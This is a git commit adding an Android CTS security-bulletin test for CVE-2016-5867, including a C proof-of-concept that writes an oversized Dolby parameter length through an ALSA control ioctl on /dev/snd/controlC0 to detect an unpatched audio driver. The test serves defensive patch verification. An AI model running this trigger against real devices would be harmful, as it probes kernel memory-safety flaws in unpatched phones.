CTS test for Android Security b/72459993
Test: successful run of newly introduced CTS test case.
Bug: 72459993
Change-Id: Iae14408c77cd9bb2919461901c43d217dbb9bd7d
(cherry picked from commit 6a32786ef4fa6c43b774aa517eaf0523ad7bc980)
(cherry picked from commit 6fd6e2dbf89cde1ca03841b275552087ca9bd90d)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index e821ce5..f5b5aa8 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -128,6 +128,7 @@
<!-- Bulletin 2017-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-5862->/data/local/tmp/CVE-2016-5862"/>
+ <option name="push" value="CVE-2016-5867->/data/local/tmp/CVE-2016-5867"/>
<!--__________________-->
<!-- Bulletin 2017-06 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
new file mode 100644
index 0000000..f7968eb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/Android.mk
@@ -0,0 +1,16 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-5867
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c
new file mode 100644
index 0000000..c8e4a20
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5867/poc.c
@@ -0,0 +1,63 @@
+/*
+ * CVE-2016-5867
+ */
+
+#include "../includes/common.h"
+#include <fcntl.h>
+#include <sound/asound.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#define DOLBY_SET_PARAM "DS1 DAP Set Param"
+#define NUM_BLOCKS 16384
+#define DOLBY_PARAM_ID_VDHE 0x0001074D
+#define TOTAL_LENGTH_DOLBY_PARAM 745
+
+unsigned int get_doblycontrolid(int fd) {
+ unsigned int i;
+ int ret = -1;
+ unsigned int id = 0;
+ struct snd_ctl_elem_list lst;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(NUM_BLOCKS, sizeof(struct snd_ctl_elem_list));
+ lst.space = NUM_BLOCKS;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
+ if (ret < 0) {
+ return 0;
+ }
+ for (i = 0; i < lst.count; i++) {
+ if (!strncmp((const char *)lst.pids[i].name, DOLBY_SET_PARAM,
+ (sizeof(DOLBY_SET_PARAM) - 1))) {
+ id = lst.pids[i].numid;
+ break;
+ }
+ }
+ free(lst.pids);
+ return id;
+}
+
+int main(){
+ int fd = -1;
+ struct snd_ctl_elem_value control;
+ int ret;
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0) {
+ return EXIT_FAILURE;
+ }
+ memset(&control, 0, sizeof(control));
+ control.id.numid = get_doblycontrolid(fd);
+ if(control.id.numid) {
+ control.value.integer.value[1] = DOLBY_PARAM_ID_VDHE;
+ control.value.integer.value[3] = TOTAL_LENGTH_DOLBY_PARAM +1;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &control);
+ if(ret == 0) {
+ close(fd);
+ return EXIT_VULNERABLE;
+ }
+ }
+ close(fd);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index eb7b29f..70e224a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -60,4 +60,14 @@
AdbUtils.runPocNoOutput("CVE-2016-5862",getDevice(), 60);
}
}
+
+ /**
+ * CVE-2016-5867
+ */
+ @SecurityTest(minPatchLevel = "2017-05")
+ public void testPocCVE_2016_5867() throws Exception {
+ if (containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2016-5867", getDevice(), 60);
+ }
+ }
}
